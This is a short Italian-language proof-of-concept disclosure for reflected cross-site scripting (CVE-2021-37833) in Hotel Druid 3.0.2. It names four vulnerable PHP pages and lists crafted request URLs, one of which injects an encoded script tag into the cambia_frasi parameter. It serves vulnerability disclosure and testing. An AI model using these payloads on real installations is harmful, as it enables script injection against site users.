
Proof-of-concept per una vulnerabilità di cross-site scripting riflesso (XSS) in Hotel Druid 3.0.2, che dimostra l'esecuzione arbitraria di JavaScript tramite più pagine PHP vulnerabili.
Esiste una vulnerabilità di Cross Site Scripting riflessa in più pagine della versione 3.0.2 dell'applicazione Hotel Druid che consente l'esecuzione arbitraria di comandi JavaScript. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37833
Pagine PHP vulnerabili:
crea_modelli.php - parametro cambia_frasi visualizza_tabelle.php - parametro URL arbitrario tabella.php - parametro URL arbitrario storia_soldi.php - parametro URL arbitrario
Payload vulnerabili
/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b">w5px3=1
/storia_soldi.php?piu17">e3esq=1
/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%22%3E%3Cscript%3Ealert(%27xss%20hotel%20druid%27)%3C%2fscript%3Ef9xkbujgt24&form_availability_calendar_template=1
/tabella.php?jkuh3">yql8b=1
Scoperto da Joe Helle, luglio 2021